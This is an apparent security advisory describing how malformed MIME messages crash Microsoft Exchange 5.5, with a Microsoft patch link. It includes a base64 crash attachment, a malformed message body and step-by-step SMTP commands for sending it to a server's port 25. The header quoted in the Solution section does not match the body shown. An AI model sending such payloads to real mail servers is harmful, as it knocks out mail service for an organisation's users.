COMMAND

    MSES

SYSTEMS AFFECTED

    Exchange 5.5 Server

PROBLEM

    Christer Enberg found following.  This happend on one of  Enberg's
    mailservers running Exchange 5.5 on WinNT4 OP5.

    Suddenly the Information Store (STORE.EXE) crashed with a  strange
    error saying something  in the way  of "Error while  processing an
    email message", restarting both  the server and all  of Exchange's
    components has no  effect at all.   The only way  of solving  this
    problem as  he discovered  is to  shut down  all Exchange Services
    and Totally remove the content of the IMCDATA directory containing
    the mail queues and then restart exchange.

    It seems that the attachment line is the problem, by removing  the
    attachment and sending the mail nothing happens.

    The message:

    ---
    Content-Type: application/octet-stream; name="exerror.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="exerror.zip"
    Content-MD5: Yoo4JubHDAg8n88PTF7oyQ==

    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
    AQABADkAAAC1BgAAAAA=

    -----

    Interesting enough, MS put  out the advisory regarding  this issue
    after Art  Savelev rediscovered  this issue.   Art Savelev  posted
    following body  of the  e-mail message  causes Microsoft  Exchange
    5.5 SP3 Internet Mail Service and Information Store to crash.

    Body:

    MIME-Version: 1.0
    
    Content-Type: multipart/alternative;
    
         boundary="=_ Boundary 1-KTwEv4jY84Hk"
    
    --=_ Boundary 1-KTwEv4jY84Hk
    
    Content-Type: text/plain;
    
            charset = ""
    
    Content-Transfer-Encoding: 7bit
    
    This message is test
    
    --=_ Boundary 1-KTwEv4jY84Hk--

    Scenario:

        1) Connect to 25th port of server (SMTP)
        2) Enter (paste) following text:

        HELO

        MAIL FROM: myself@myserver.com

        RCPT TO: administrator

        DATA

        3) Now paste the body from above
        4) Type <CRLF>.<CRLF> (that is Enter-dot-Enter)
        5) Type quit
        6) Wait a  little, and try  to connect to  25th port again  to
           verify - it shouldn't work.

SOLUTION

    The problem is probably in Content-Type: field

        Content-Type: multipart/mixed;
                boundary = ""

    As you can see boundary (delimeter between MIME parts) is declared
    empty.  It seems Exchange crashes  when it tries to locate end  of
    the part (every part must begin with "--" + boundary and end  with
    boundary.

    Patch availability:

        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443

    This patch  can be  applied atop  systems running  Exchange Server
    5.5 Service Pack 3.  It is included in Exchange Server 5.5 Service
    Pack 4. Exchange Server 2000 is not affected by the vulnerability.